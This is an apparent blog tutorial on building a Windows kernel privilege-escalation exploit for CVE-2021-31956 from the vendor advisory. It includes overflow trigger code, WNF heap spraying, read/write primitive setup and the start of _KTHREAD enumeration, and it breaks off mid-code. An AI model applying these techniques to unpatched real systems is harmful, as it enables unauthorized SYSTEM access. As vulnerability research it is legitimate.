CVE-2021-31956 exploit and analysis

2022-09-03

Exploiting a paged pool overflow on Windows 10 to get SYSTEM.

Introduction

In this post we’ll cover how to write an n-day exploit for a Windows kernel pool overflow on a modern Windows 10 20H2 system, starting from nothing more than an initial advisory such as the one from Kaspersky regarding CVE-2021-31956 [1].

Advisory

The other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function NtfsQueryEaUserEaList processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via ntoskrnl syscall and among other things it’s possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn’t check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.

for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )
{
  ...
 
  out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);
 
  if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )
  {
	ea_block = eas_blocks_for_file + ea_block_pos;
	ea_block_size = ea_block->DataLength + ea_block->NameLength + 9;
	if ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible
	{
  	memmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow
  	*out_buf_pos = 0;
	}
  }
  else
  {
	...
  }
 
  ...
 
  occupied_length += ea_block_size + padding;
  out_buf_length -= ea_block_size + padding;
  padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
 
  ...
}

The exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.

As the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used “PreviousMode” technique instead.

Above is the original advisory released by Kaspersky, whose researchers first detected this vulnerability being exploited in the wild.

It contains a lot of information. The important points are:

a heap-based buffer overflow in ntfs.sys
function NtfsQueryEaUserEaList
accessible via ntoskrnl syscall
integer-underflow
exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF)
exploit uses a rarely used “PreviousMode” technique

Nicely commented and named pseudocode is also provided, which greatly eases the reverse engineering effort.

Armed with this information, let’s try to recreate the exploit.

Finding the syscall

The original advisory states that the bug can be triggered via an ntoskrnl syscall, which is available to usermode.

This syscall is our entry point into the kernel, so we need to identify it first.

Browsing a website that documents syscalls [2], we find that the only two syscalls related to EAs (extended attributes) are NtQueryEaFile and NtSetEaFile.

Judging by name, one probably allows us to set extended attributes on a file, and the other allows querying those attributes.

We can confirm this by breaking on NtfsQueryEaUserEaList in WinDbg, clicking around and viewing the call stack once the breakpoint hits.

0: kd> g
Breakpoint 0 hit
Ntfs!NtfsQueryEaUserEaList:
fffff802`3603c124 4c894c2420      mov     qword ptr [rsp+20h],r9
3: kd> k
 # Child-SP          RetAddr               Call Site
00 ffffc70c`4e0902a8 fffff802`3603bc7a     Ntfs!NtfsQueryEaUserEaList
01 ffffc70c`4e0902b0 fffff802`3609c836     Ntfs!NtfsCommonQueryEa+0x22a
02 ffffc70c`4e090410 fffff802`3609c590     Ntfs!NtfsFsdDispatchSwitch+0x286
03 ffffc70c`4e090540 fffff802`342dc6c5     Ntfs!NtfsFsdDispatchWait+0x40
04 ffffc70c`4e0907e0 fffff802`35346ccf     nt!IofCallDriver+0x55
05 ffffc70c`4e090820 fffff802`353448d3     FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
06 ffffc70c`4e090890 fffff802`342dc6c5     FLTMGR!FltpDispatch+0xa3
07 ffffc70c`4e0908f0 fffff802`346d1528     nt!IofCallDriver+0x55
08 ffffc70c`4e090930 fffff802`34681344     nt!IopSynchronousServiceTail+0x1a8
09 ffffc70c`4e0909d0 fffff802`34415bb5     nt!NtQueryEaFile+0x484
0a ffffc70c`4e090a90 00007ff8`c05ce634     nt!KiSystemServiceCopyEnd+0x25
0b 000000bf`4367e918 00007ff8`acca903e     ntdll!NtQueryEaFile+0x14
0c 000000bf`4367e920 ffffffff`ffffffff     0x00007ff8`acca903e
0d 000000bf`4367e928 000000bf`4367e988     0xffffffff`ffffffff
0e 000000bf`4367e930 00000000`00000000     0x000000bf`4367e988

Indeed, the usermode API NtQueryEaFile will eventually call the vulnerable function.

Fortunately for us, the ZwQueryEaFile [3] and ZwSetEaFile [4] APIs are actually documented by MSDN.

Zw functions basically set a field called PreviousMode in the _KTHREAD structure to 0 to indicate a call from kernel mode, so that usermode checks are skipped when the request is dispatched, and then call the corresponding Nt function.

That being said, you can use the Zw function prototypes as the Nt function prototypes.

Initial POC

NTSTATUS ZwQueryEaFile(
  [in]           HANDLE           FileHandle,
  [out]          PIO_STATUS_BLOCK IoStatusBlock,
  [out]          PVOID            Buffer,
  [in]           ULONG            Length,
  [in]           BOOLEAN          ReturnSingleEntry,
  [in, optional] PVOID            EaList,
  [in]           ULONG            EaListLength,
  [in, optional] PULONG           EaIndex,
  [in]           BOOLEAN          RestartScan
);

NTSTATUS ZwSetEaFile(
  [in]  HANDLE           FileHandle,
  [out] PIO_STATUS_BLOCK IoStatusBlock,
  [in]  PVOID            Buffer,
  [in]  ULONG            Length
);

Reading the documentation reveals that both functions take a buffer of _FILE_FULL_EA_INFORMATION [5] or _FILE_GET_EA_INFORMATION [6] structures.

Both are by nature non-circular singly linked lists, linked by the NextEntryOffset member. A _FILE_FULL_EA_INFORMATION entry stores an EaName and an EaValue separated by a null byte, while a _FILE_GET_EA_INFORMATION entry stores only the EaName.

Each entry should be 4-byte aligned [7].
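To make the layout concrete, here is a minimal userland sketch that builds and walks such a list. The struct ea_entry below mirrors the documented field order of _FILE_FULL_EA_INFORMATION but is redefined locally so that the snippet compiles without Windows headers. ea_raw_size, ea_append and ea_count are hypothetical helper names of my own, not Windows APIs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local stand-in for FILE_FULL_EA_INFORMATION (same field order). */
struct ea_entry {
    uint32_t NextEntryOffset; /* 0 marks the last entry */
    uint8_t  Flags;
    uint8_t  EaNameLength;    /* excludes the terminating null */
    uint16_t EaValueLength;
    char     EaName[1];       /* name, null byte, then the value */
};

/* Bytes used by one entry: 8-byte header + name + null + value. */
static uint32_t ea_raw_size(uint8_t name_len, uint16_t value_len)
{
    return (uint32_t)offsetof(struct ea_entry, EaName) + name_len + 1u + value_len;
}

/* Writes one entry at buf + off and returns the 4-byte aligned offset of
 * the next slot. The caller guarantees buf is 4-byte aligned and big enough. */
static uint32_t ea_append(uint8_t *buf, uint32_t off, const char *name,
                          const void *value, uint16_t value_len, int is_last)
{
    struct ea_entry *e;
    char *payload;
    uint8_t name_len = (uint8_t)strlen(name);
    uint32_t aligned = (ea_raw_size(name_len, value_len) + 3u) & ~3u;

    assert((off & 3u) == 0); /* every entry must start 4-byte aligned */
    e = (struct ea_entry *)(buf + off);
    payload = (char *)e + offsetof(struct ea_entry, EaName);

    e->NextEntryOffset = is_last ? 0u : aligned;
    e->Flags = 0;
    e->EaNameLength = name_len;
    e->EaValueLength = value_len;
    memcpy(payload, name, (size_t)name_len + 1u);      /* copies the null too */
    memcpy(payload + name_len + 1u, value, value_len); /* value follows the null */
    return off + aligned;
}

/* Follows NextEntryOffset until it hits 0 and counts the entries. */
static unsigned ea_count(const uint8_t *buf)
{
    const struct ea_entry *e = (const struct ea_entry *)buf;
    unsigned n = 1;

    while (e->NextEntryOffset != 0) {
        e = (const struct ea_entry *)((const uint8_t *)e + e->NextEntryOffset);
        n++;
    }
    return n;
}
```

Appending a 3-character name with a 0x9d-byte value uses 0xa9 raw bytes, so the next entry starts at offset 0xac.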

An example of setting and querying two EAs for a file looks like this:

HANDLE                      file = INVALID_HANDLE_VALUE;
IO_STATUS_BLOCK             x = { 0 };
FILE_FULL_EA_INFORMATION    *fetched_data = zalloc(0x300);
FILE_GET_EA_INFORMATION     *selector = zalloc(0x300);
FILE_GET_EA_INFORMATION     *selector2;
FILE_FULL_EA_INFORMATION    *eadata1 = zalloc(0x300);
FILE_FULL_EA_INFORMATION    *eadata2;

file = CreateFileA("c:\\users\\chenl\\desktop\\ABC.txt",
    GENERIC_READ | GENERIC_WRITE,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL,
    CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL,
    NULL);

selector->EaNameLength = (UCHAR)strlen(EANAME1);
memcpy(selector->EaName, EANAME1, selector->EaNameLength);
selector->NextEntryOffset = (ULONG)0xc;

selector2 = (PFILE_GET_EA_INFORMATION)((UINT64)selector + (UINT64)(selector->NextEntryOffset));
selector2->EaNameLength = (UCHAR)strlen(EANAME2);
memcpy(selector2->EaName, EANAME2, selector2->EaNameLength);
selector2->NextEntryOffset = (ULONG)0x0;

eadata1->Flags = (UCHAR)0x0;
eadata1->EaNameLength = (UCHAR)strlen(EANAME1);
eadata1->EaValueLength = (USHORT)0x9d;
memcpy(eadata1->EaName, EANAME1, eadata1->EaNameLength);
memset(eadata1->EaName + eadata1->EaNameLength + 0x1, 'C', eadata1->EaValueLength);
eadata1->NextEntryOffset = (ULONG)((eadata1->EaNameLength + eadata1->EaValueLength + 0x3 + 0x9) & (~0x3));

eadata2 = (PFILE_FULL_EA_INFORMATION)((UINT64)eadata1 + (UINT64)(eadata1->NextEntryOffset));
eadata2->NextEntryOffset = (ULONG)0x0;
eadata2->Flags = (UCHAR)0x0;
eadata2->EaNameLength = (UCHAR)strlen(EANAME2);
eadata2->EaValueLength = (USHORT)eadata2_chunk_sz;
memcpy(eadata2->EaName, EANAME2, eadata2->EaNameLength);
memcpy(eadata2->EaName + eadata2->EaNameLength + 0x1, eadata2_data, eadata2_data_sz);

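// Set both EAs on the file; eadata1 chains to eadata2 via NextEntryOffset.
_NtSetEaFile(file, &x, eadata1, 0x300);

// Query both EAs back by name into a 0xaa-byte output buffer.
NtQueryEaFile(file, &x, fetched_data, 0xaa, FALSE, selector, 0x300, NULL, TRUE);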

The NextEntryOffset calculation is taken from the decompiled NtfsQueryEaUserEaList above. The 0x9 bytes cover the 8 bytes of fixed header fields plus the null terminator after EaName, and adding 0x3 before the bitwise AND makes the alignment to 0x4 bytes round up rather than down.

If we want an integer underflow, out_buf_length must be smaller than padding while the second EA entry is being processed.

The smallest non-zero out_buf_length we can be left with is 0x1, which happens when the output size we specify is 1 byte larger than our first EA entry.

The largest padding we can achieve is 0x3.

Using the values in the code above, a name length of 0x3 and a value length of 0x9d give a total of 0xa0, which is 4-byte aligned. Adding 0x9 to it gives 0xa9, which is one byte past a 4-byte boundary.

Rounding 0xa9 up to 0xac therefore yields a padding of exactly 0x3 bytes.

Subtracting this padding from the smaller unsigned out_buf_length wraps around to a huge unsigned value, so the size check passes and we get a pool overflow with controlled size and controlled data.
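The arithmetic is easy to replay in userland. The sketch below copies the padding formula and the size check from the advisory pseudocode, and replays the loop bookkeeping for two entries. safe_check is just one possible way to guard the subtraction, written for illustration. I am not claiming it is what the actual patch does. All function names here are my own.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef bool (*size_check_fn)(uint32_t, uint32_t, uint32_t);

/* Padding needed to bring the next entry to a 4-byte boundary. */
static uint32_t ea_padding(uint32_t ea_block_size)
{
    return ((ea_block_size + 3u) & 0xFFFFFFFCu) - ea_block_size;
}

/* The check as written in the advisory pseudocode. The subtraction is
 * unsigned, so it wraps around when padding > out_buf_length. */
static bool vulnerable_check(uint32_t ea_block_size, uint32_t out_buf_length,
                             uint32_t padding)
{
    return ea_block_size <= out_buf_length - padding;
}

/* Illustrative guarded variant: refuse before the subtraction can wrap. */
static bool safe_check(uint32_t ea_block_size, uint32_t out_buf_length,
                       uint32_t padding)
{
    return padding <= out_buf_length &&
           ea_block_size <= out_buf_length - padding;
}

/* Replays the loop bookkeeping for two entries and reports whether the
 * copy of the second entry would be allowed by the given check. */
static bool second_copy_runs(uint32_t out_len, uint32_t size1, uint32_t size2,
                             size_check_fn check)
{
    uint32_t padding = 0; /* the first entry has no padding in front of it */

    if (!check(size1, out_len, padding))
        return false;

    out_len -= size1 + padding;   /* 0xaa - 0xa9 leaves 0x1 */
    padding = ea_padding(size1);  /* 0xa9 needs 0x3 bytes of padding */
    assert(padding < 4u);

    return check(size2, out_len, padding);
}
```

With an output length of 0xaa and a first entry of 0xa9 bytes, the vulnerable check accepts a second entry of any realistic size, while the guarded variant rejects it.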

The question now is, is the size of pool allocation exactly the size we pass in?

We can verify it in IDA, by decompiling the parent function of NtfsQueryEaUserEaList, which is NtfsCommonQueryEa.

pool_buf = ExAllocatePoolWithTag((POOL_TYPE)(PoolType | 0x10), (unsigned int)size, 0x4546744Eu);
v28 = pool_buf;
v24 = 1;
v16 = size;
memset(pool_buf, 0, v16);
...
NtfsLookupEasOnFile(a1, v4,
                    (unsigned int)v40, 
                    (unsigned int)&v29,
                    (__int64)&v30,
                    (__int64)&Bcb
                    );
if ( v37[0] )
{
        v17 = (_OWORD *)NtfsQueryEaUserEaList((__int64)v37, v30, (__int64)v29, (char *)pool_buf, size, v37[0], v42);

If our assumptions are correct, r9 should point to a 0xc0-sized pool chunk (0xaa plus the 0x10-byte pool header, rounded up), and dword ptr [rsp+0x28] should contain the size 0xaa (0x28 because of the return address and the home space for the 4 register arguments).

1: kd> g
Breakpoint 0 hit
Ntfs!NtfsQueryEaUserEaList:
fffff802`3603c124 4c894c2420      mov     qword ptr [rsp+20h],r9
1: kd> dd rsp+0x28 L1
ffffc70c`4ed642d0  000000aa
1: kd> !pool @r9
Pool page ffff8f8f005855e0 region is Paged pool
*ffff8f8f005855d0 size:   c0 previous size:    0  (Allocated) *NtFE
		Pooltag NtFE : Ea.c, Binary : ntfs.sys

And yes, we were right.
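The rounding that turns a 0xaa-byte request into a 0xc0-sized chunk can be written down as a tiny helper. This is only a sketch of the arithmetic, assuming a 0x10-byte pool header and 0x10-byte granularity on x64. It ignores everything else the allocator does, and pool_chunk_size is a name I made up.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u /* assumption: size of the x64 pool header */
#define POOL_GRANULARITY 0x10u /* assumption: x64 pool block granularity  */

/* Chunk size reported by !pool for a given request size: add the pool
 * header, then round up to the next multiple of the granularity. */
static uint32_t pool_chunk_size(uint32_t requested)
{
    assert(requested <= UINT32_MAX - POOL_HEADER_SIZE - POOL_GRANULARITY);
    return (requested + POOL_HEADER_SIZE + POOL_GRANULARITY - 1u)
           & ~(POOL_GRANULARITY - 1u);
}
```

Under these assumptions a 0xaa-byte request and a 0xa8-byte structure both end up in 0xc0-sized chunks, which matters later when picking a structure to place next to our buffer.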

If we allow the code to continue, it will certainly corrupt the pool chunk after ours, and likely crash the whole system.

We have to first “prepare” the pool to accept an overflow, so it’s predictable to us.

WNF

Before starting the exploitation steps, I’ll need to digress a little and talk about the Windows Notification Facility (WNF).

If you want a proper explanation regarding WNF and not my hacky garbage, check out this talk at Black Hat [8] and this blogpost by Gabrielle Viala [9].

Essentially, WNF is a feature of Windows for applications to deal with notifications.

For example, when an application has to wait on an event before continuing, but the event does not exist yet, it can use WNF to monitor for that event.

Like all features of Windows, it is essentially a bunch of structures in the kernel.

WNF has two main structures of interest, _WNF_NAME_INSTANCE and _WNF_STATE_DATA.

//0xa8 bytes (sizeof)
struct _WNF_NAME_INSTANCE
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    struct _EX_RUNDOWN_REF RunRef;                                          //0x8
    struct _RTL_BALANCED_NODE TreeLinks;                                    //0x10
    struct _WNF_STATE_NAME_STRUCT StateName;                                //0x28
    struct _WNF_SCOPE_INSTANCE* ScopeInstance;                              //0x30
    struct _WNF_STATE_NAME_REGISTRATION StateNameInfo;                      //0x38
    struct _WNF_LOCK StateDataLock;                                         //0x50
    struct _WNF_STATE_DATA* StateData;                                      //0x58
    ULONG CurrentChangeStamp;                                               //0x60
    VOID* PermanentDataStore;                                               //0x68
    struct _WNF_LOCK StateSubscriptionListLock;                             //0x70
    struct _LIST_ENTRY StateSubscriptionListHead;                           //0x78
    struct _LIST_ENTRY TemporaryNameListEntry;                              //0x88
    struct _EPROCESS* CreatorProcess;                                       //0x98
    LONG DataSubscribersCount;                                              //0xa0
    LONG CurrentDeliveryCount;                                              //0xa4
};

//0x10 bytes (sizeof)
struct _WNF_STATE_DATA
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    ULONG AllocatedSize;                                                    //0x4
    ULONG DataSize;                                                         //0x8
    ULONG ChangeStamp;                                                      //0xc
};

We can create a name instance using the NtCreateWnfStateName API.

typedef NTSTATUS(NTAPI *NCWSN)(
    _Out_ PWNF_STATE_NAME StateName,
    _In_ WNF_STATE_NAME_LIFETIME NameLifetime,
    _In_ WNF_DATA_SCOPE DataScope,
    _In_ BOOLEAN PersistData,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_ ULONG MaximumStateSize,
    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor
    );

This will return a StateName to usermode, which we can use to reference this particular name instance.

By passing this statename to the NtUpdateWnfStateData function, a _WNF_STATE_DATA structure is created.

The StateData member (offset 0x58) of the name instance points to this statedata structure.

typedef NTSTATUS(NTAPI *NUWSD)(
    _In_ PWNF_STATE_NAME StateName,
    _In_reads_bytes_opt_(Length) const VOID *Buffer,
    _In_opt_ ULONG Length,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_opt_ const PVOID ExplicitScope,
    _In_ WNF_CHANGE_STAMP MatchingChangeStamp,
    _In_ ULONG CheckStamp
    );

The Length argument we pass is used to populate the AllocatedSize and DataSize of the _WNF_STATE_DATA structure, where AllocatedSize defines the size we can write, and DataSize defines the size we can read.

StateData = 0i64;
  if ( *(_QWORD *)(NameInstance + 0x58) != 1i64 )
    StateData = *(_DWORD **)(NameInstance + 0x58);
  if ( !StateData && (*(_QWORD *)(NameInstance + 0x68) || (_DWORD)_length)
    || (v13 = StateData) != 0i64 && StateData[1] < (unsigned int)_length )
  {
      v19 = ExAllocatePoolWithTag(PagedPool, (unsigned int)(_length + 0x10), 0x20666E57u);

...

for ( i = *(_DWORD *)(NameInstance + 0x60) + 1; !i; i = 1 )
    ;
  if ( *(_QWORD *)&alsoStateData )
  {
    memmove((void *)(*(_QWORD *)&alsoStateData + 0x10i64), _buffer, _length);
    *(_DWORD *)(*(_QWORD *)&alsoStateData + 8i64) = _length;
    *(_DWORD *)(*(_QWORD *)&alsoStateData + 0xCi64) = i;

The simplified pseudocode above for ExpWnfWriteStateData shows that if StateData.AllocatedSize < Length, a new buffer is allocated in the paged pool (controllable length again!). The new buffer is 0x10 bytes larger than Length, because a _WNF_STATE_DATA header sits in front of the actual data.

Otherwise if AllocatedSize >= Length, data is copied to the old buffer, DataSize(read size) is set to Length, and ChangeStamp is updated accordingly.
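The two branches are easier to see in a small userland model. The sketch below is not the kernel code. state_data_model and model_write are hypothetical names, malloc stands in for the pool allocator, and the model always allocates when there is no buffer yet, which simplifies the real condition.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Userland model of a _WNF_STATE_DATA header followed by its payload. */
struct state_data_model {
    uint32_t Header;
    uint32_t AllocatedSize; /* how much may be written */
    uint32_t DataSize;      /* how much will be read back */
    uint32_t ChangeStamp;
    uint8_t  Data[];        /* payload starts 0x10 bytes in */
};

/* Reallocates only when the current buffer is missing or too small,
 * otherwise reuses it. Returns 0 on success, -1 if allocation fails. */
static int model_write(struct state_data_model **slot, const void *buf,
                       uint32_t len, uint32_t stamp)
{
    struct state_data_model *sd = *slot;

    assert(buf != NULL || len == 0);

    if (sd == NULL || sd->AllocatedSize < len) {
        /* 0x10-byte header plus len bytes of payload */
        struct state_data_model *fresh = malloc(sizeof *fresh + len);
        if (fresh == NULL)
            return -1;
        fresh->Header = 0;          /* placeholder, the model ignores it */
        fresh->AllocatedSize = len;
        free(sd);
        *slot = sd = fresh;
    }

    if (len != 0)
        memcpy(sd->Data, buf, len);
    sd->DataSize = len;      /* a later read returns exactly this many bytes */
    sd->ChangeStamp = stamp;
    return 0;
}
```

Writing 0x20 bytes and then 0x10 bytes reuses the same buffer with AllocatedSize still at 0x20, while a following 0x40-byte write forces a fresh allocation.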

We can read data with NtQueryWnfStateData:

typedef NTSTATUS(NTAPI *NQWSD)(
    _In_ PCWNF_STATE_NAME StateName,
    _In_opt_ PCWNF_TYPE_ID TypeId,
    _In_opt_ const VOID *ExplicitScope,
    _Out_ PWNF_CHANGE_STAMP ChangeStamp,
    _Out_writes_bytes_to_opt_(*BufferSize, *BufferSize) PVOID Buffer,
    _Inout_ PULONG BufferSize
    );

*ChangeStamp = *(_DWORD *)(*(_QWORD *)&StateData + 0xCi64);
*BufferSize = *(_DWORD *)(*(_QWORD *)&StateData + 8i64);
datasize = *(_DWORD *)(*(_QWORD *)&StateData + 8i64);
if ( usermode_address_max < datasize )
{
  v14 = -1073741789; // 0xC0000023, STATUS_BUFFER_TOO_SMALL
}
else
{
  memmove(Buffer, (const void *)(*(_QWORD *)&StateData + 0x10i64), datasize);

As shown in the simplified pseudocode for ExpWnfReadStateData, ChangeStamp and BufferSize are set to whatever values sit at StateData+0xC and StateData+0x8 respectively. The data is then copied back to usermode, provided the caller’s buffer is large enough.
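The detail that matters later is that the two output fields are written before the size check, so they come back even when the call fails. Here is a userland model of that behaviour, following the order of operations in the pseudocode. model_query and the MODEL_ constants are names of my own, and the state data is just a byte blob in our own process.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MODEL_STATUS_SUCCESS          0x00000000u
#define MODEL_STATUS_BUFFER_TOO_SMALL 0xC0000023u

/* The four dwords at the start of a _WNF_STATE_DATA. */
struct state_data_view {
    uint32_t Header;
    uint32_t AllocatedSize;
    uint32_t DataSize;    /* offset 0x8 */
    uint32_t ChangeStamp; /* offset 0xC */
};

/* Model of the read path: report the stamp and size first, then copy the
 * payload only if the caller's buffer can hold DataSize bytes. */
static uint32_t model_query(const void *state_data, uint32_t *change_stamp,
                            void *buffer, uint32_t *buffer_size)
{
    struct state_data_view hdr;
    uint32_t caller_size;

    assert(state_data != NULL && change_stamp != NULL && buffer_size != NULL);

    memcpy(&hdr, state_data, sizeof hdr);
    caller_size = *buffer_size;

    *change_stamp = hdr.ChangeStamp; /* returned even on failure */
    *buffer_size  = hdr.DataSize;    /* returned even on failure */

    if (caller_size < hdr.DataSize)
        return MODEL_STATUS_BUFFER_TOO_SMALL;

    if (hdr.DataSize != 0)
        memcpy(buffer, (const uint8_t *)state_data + sizeof hdr, hdr.DataSize);
    return MODEL_STATUS_SUCCESS;
}
```

A first call with a buffer that is too small still tells us DataSize and ChangeStamp, and a second call with the reported size succeeds.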

Finally, we can free both allocations with NtDeleteWnfStateData and NtDeleteWnfStateName.

All in all, using both of these structures together can give us a really good read/write primitive.

The _WNF_NAME_INSTANCE structure is 0xc0 sized in the paged pool. That’s why I chose the overflow chunk in the previous section to also be 0xc0 sized.

Size of the _WNF_STATE_DATA structure can be controlled, based on the Length we pass to NtUpdateWnfStateData.

Exploitation Outline

The idea is to get our overflowing Ntfs buffer from earlier placed right before a _WNF_STATE_DATA chunk in memory.

By overwriting its AllocatedSize and DataSize, we gain a large relative read/write over the pool memory that follows this chunk.

We can use this to find a nearby _WNF_NAME_INSTANCE chunk, and locate its StateName.

With the StateName, we can now query the _WNF_STATE_DATA associated with this name instance (remember that the statename is a reference to the name instance).

Using our write ability, update the StateData pointer of the name instance to point anywhere in memory.

As long as the eventual AllocatedSize and DataSize of our rogue _WNF_STATE_DATA is sane, we can read/write anywhere in memory.

Heap Spray

The kernel is active, and thousands of allocations and de-allocations are happening all the time.

The only way to maximize our chances of having the Ntfs buffer placed before a _WNF_STATE_DATA buffer is to create tens of thousands of statedata buffers in the paged pool.

for (int i = 0; i < count; i++) {
        status = _NtCreateWnfStateName(&(statenames[i]), WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, sd);

        status = _NtUpdateWnfStateData(&(statenames[i]), buf, buf_sz, 0, 0, 0, 0); // spray 0xc0 sized kernel chunks
    }

This process is known as Heap Spraying.

Then we free roughly one third of the chunks.

for (int i = 0; i < count; i += 3) {
        // create holes
        status = _NtDeleteWnfStateData(&(statenames[i]), NULL);

        status = _NtDeleteWnfStateName(&(statenames[i]));

        statenames[i].Data[0] = 0;
        statenames[i].Data[1] = 0;
    }

If we think of the pool full of WNF structures as a big blob of cheese, there are now thousands of holes in the cheese.

Many of these will be taken up by other 0xc0 size structures, allocated by other processes or even the kernel itself.

However, if we are lucky (and if we spray enough), we should land right in the middle of a bunch of WNF structures.

1: kd> !pool @r9
Pool page ffff8f8f005855e0 region is Paged pool
 ffff8f8f00585090 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585150 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585210 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f005852d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585390 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585450 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585510 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
*ffff8f8f005855d0 size:   c0 previous size:    0  (Allocated) *NtFE
		Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8f8f00585690 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585750 size:   c0 previous size:    0  (Free)       Wnf
 ffff8f8f00585810 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f005858d0 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585990 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585a50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585b10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585bd0 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585c90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585d50 size:   c0 previous size:    0  (Free)       Wnf 
 ffff8f8f00585e10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080
 ffff8f8f00585ed0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffffb48f54587080

The WNF Problem

The approach above has a pretty big problem: we do not know whether we have overflowed a _WNF_STATE_DATA chunk or a _WNF_NAME_INSTANCE chunk, since both are 0xc0 sized.

Blindly assuming one or the other greatly reduces the success rate.

If we inspect both structures, we can see that the ChangeStamp member of the statedata is returned to usermode on a query.

This means that if we carefully limit the overflow to 0x20 bytes (the pool header plus everything up to and including ChangeStamp), we can query all statedata chunks to check whether we actually overflowed a statedata chunk.

If we did not, the overflow only corrupts the Header and RunRef fields of a nameinstance chunk, which is OK for now, as we can fix that at the end of the exploit. We just have to attempt the overflow again.

do {
    if (!NT_SUCCESS(overflow_chunk(OVERFLOW_SZ, OVERFLOW_DATA, OVERFLOW_SZ)))
        goto out;

} while (!NT_SUCCESS(find_chunk(statenames, SPRAY_COUNT, &buf, &buf_sz, &overflow_idx)));

Enumerating _KTHREADs

Now, assuming our attack succeeded and we gain arbitrary read/write, where should we write?

Of course, we could directly NULL out the current process’s ACL or steal a SYSTEM token, but to emulate the adversary, I think we should perform the PreviousMode attack.

More about PreviousMode in the next section. For now, just know that it’s a field in the _KTHREAD structure, which is reachable through the _KPROCESS structure’s ThreadListHead member, and that _KPROCESS shares its address with _EPROCESS.

In order to increase the success rate of our attack, we should perform the attack on all _KTHREADs present in the process.

With our arbitrary read, we first read the Blink of the ThreadListHead member, the backward link of the circular doubly linked LIST_ENTRY.

This Blink points to the ThreadListEntry field of the first _KTHREAD we visit (the last one in the list), so we subtract 0x2f8 to find that _KTHREAD’s address.
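The pointer arithmetic here is the usual "containing record" trick: a list link points into the middle of a structure, and subtracting the field offset gives the start of the structure. Below is a minimal sketch working on plain integers, using the 0x2f8 offset from this post and the same kernel-address sanity check as my exploit code. The helper names are made up for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define KTHREAD_THREADLISTENTRY_OFFSET 0x2f8ull /* offset used in this post (20H2) */
#define KERNEL_SPACE_START 0xFFFF800000000000ull

/* Cheap sanity check: anything below this is not a kernel pointer. */
static bool looks_like_kernel_address(uint64_t addr)
{
    return addr >= KERNEL_SPACE_START;
}

/* Converts the address of a ThreadListEntry into the address of the
 * _KTHREAD that contains it. */
static uint64_t kthread_from_list_entry(uint64_t entry_addr)
{
    assert(entry_addr >= KTHREAD_THREADLISTENTRY_OFFSET);
    return entry_addr - KTHREAD_THREADLISTENTRY_OFFSET;
}
```

If the value we leak is garbage, the result usually falls outside the kernel range, which is why the check is worth doing before using the address.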

threadlisthead = (ULONG_PTR)((ULONG_PTR)own_eproc + (ULONG_PTR)0x30);
    arbwrite_name->StateData = threadlisthead;
    
    if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
        goto out;

    ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;

    _NtQueryWnfStateData((WNF_STATE_NAME *)&ext_statename, NULL, NULL, &stamp, write_data, &write_data_sz); // this call will fail, so we don't error check
    
    kthread_blink = (UINT64)stamp << 32 | (UINT32)write_data_sz;
    write_data_sz = 0x5000;
    memcpy(write_data, read_data, 0x5000);

